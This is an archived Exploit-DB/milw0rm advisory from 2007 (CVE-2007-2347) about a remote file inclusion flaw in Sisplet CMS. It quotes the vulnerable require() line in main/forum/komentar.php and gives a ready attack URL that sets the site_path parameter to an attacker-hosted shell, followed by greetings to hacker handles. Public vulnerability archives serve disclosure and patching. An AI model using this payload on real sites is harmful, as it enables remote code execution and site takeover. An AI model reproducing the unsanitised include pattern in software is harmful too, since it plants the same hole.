Sisplet CMS 05.10 - 'site_path' Remote File Inclusion
Author: kezzap66345
type: webapps
platform: php
port:
date_added: 2007-04-04
date_updated: 2016-12-13
verified: 1
codes: OSVDB-35618;CVE-2007-2347
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comSisplet051005.tar.gz
Sisplet CMS
*****************
Found by kezzap66345 *
*****************
*****************
Script Download:http://www.sisplet.org/uploadi/editor/Sisplet0504.tar.bz2
https://sourceforge.net/project/showfiles.php?group_id=111881
*****************
*****************
ERROR#1:
File:main/forum/komentar.php
*****************
require($site_path.'main/forum/class.php'); <<< rfi coded
**************************************************************************************
RFI#1:
http://SITE.com/path/main/forum/komentar.php?site_path=[SHELL]
**************************************************************************************
**************************************************************************************
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************
# milw0rm.com [2007-04-05]